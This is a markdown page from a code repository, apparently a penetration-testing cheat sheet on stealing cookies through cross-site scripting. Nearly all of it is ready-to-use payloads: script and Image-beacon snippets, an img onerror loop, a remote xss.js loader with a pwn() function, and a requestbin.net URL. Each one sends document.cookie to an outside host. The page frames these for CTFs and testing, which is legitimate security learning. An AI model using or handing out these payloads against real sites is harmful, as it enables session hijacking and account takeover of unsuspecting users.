Skip to content

Latest commit

 

History

History
67 lines (45 loc) · 2.52 KB

stealing-cookies.md

File metadata and controls

67 lines (45 loc) · 2.52 KB

Stealing Cookies

Stealing cookies to obtain privileges is the fever dream of hackers looking to exploit cross-site scripting vulnerabilities.

Payloads

Verification with alert()

This payload will pop an alert() box prior to sending the cookie. This can be usefuil for testing a cross-site scripting payload and verifying that it is grabbing the intended information. Once the alert() box closes, the cookie will be sent to the arbitrary server:

<script>
alert(document.cookie);
var i=new Image;
i.src="http://172.0.0.1:1337/?"+document.cookie;
</script>

Exfiltrating cookies without alert()

After verifying that the parameter is susceptible to cross-site scripting, we can leverage the following payload to exfiltrate cookies silently:

<script>var i=new Image;i.src="http://172.0.0.1:1337/?"+document.cookie;</script>

CTF Only Payload

The following payload leverages the img tag rather then script and will call onerror() in a loop, ultimately filling up your server with cookies. I have found this can be life-saving in a CTF when things may not be working as the author originally intended:

<img src=x onerror=this.src='http://172.0.0.1:1337/?'+document.cookie;>

My Preferred Method

The way that I like to go about capturing cookies is submitting the following payload, calling back to a JavaScript file that I am host on a Python web server:

<script src="http://172.0.0.1/xss.js"></script>
"><script src=http://172.0.0.1/xss.js></script>

The xss.js file looks like the following, ultimately it is doing the same as the above payloads by grabbing and sending the cookies to my hosted web server:

function pwn() {
    var img = document.createElement("img");
    img.src = "http://172.0.0.1/xss?=" + document.cookie;
    document.body.appendChild(img);
}
pwn();

Capturing the Cookies

Unless you're in a CTF environment, I would highly recommend capturing the cookies on a local web server or controlled Burp collaborator instance. I'm not sure about you, but sending cookies to a random website seems like a bad idea to me. That being said, there are sites that exist such as requestbin to send the request to:

http://172.0.0.1:1337/<script>new Image().src="http://requestbin.net/r/mybin?c="+document.cookie;</script>

References

{% embed url="https://github.com/R0B1NL1N/WebHacking101/blob/master/xss-reflected-steal-cookie.md" %}

{% embed url="https://snowscan.io/htb-writeup-bankrobber/" %}